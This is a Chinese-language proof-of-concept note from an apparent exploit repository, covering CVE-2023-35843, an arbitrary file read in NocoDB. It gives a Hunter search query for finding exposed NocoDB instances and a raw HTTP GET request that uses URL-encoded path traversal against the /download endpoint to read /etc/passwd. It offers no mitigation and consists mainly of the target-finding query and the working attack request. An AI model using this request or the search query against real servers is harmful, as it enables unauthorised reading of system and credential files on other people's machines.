POC/wpoc/NocoDB/NocoDB任意文件读取漏洞(CVE-2023-35843).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

32 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# NocoDB任意文件读取漏洞CVE-2023-35843
# 一、漏洞简介
NocoDB是一个开源 Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 转换为智能电子表格。NocoDB存在任意文件读取漏洞。
# 二、影响版本
+ NocoDB
# 三、资产测绘
+ hunter`web.icon=="5d7c3d89c1d24cb4f15a508f7f0b6daf"&&web.title="NocoDB"`
+ 登录页面
![1693921077108-552cf2d5-970a-4f6e-bbcd-bf48e2538189.png](./img/9vDPKBC4oRNWg3jb/1693921077108-552cf2d5-970a-4f6e-bbcd-bf48e2538189-144298.png)
# 四、漏洞复现
```plain
GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![1693921148029-64aff3bb-16ff-4f8d-a963-b219bd5f9790.png](./img/9vDPKBC4oRNWg3jb/1693921148029-64aff3bb-16ff-4f8d-a963-b219bd5f9790-721038.png)
> 更新: 2024-02-29 23:57:33
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fvdfqew9f4ggosya>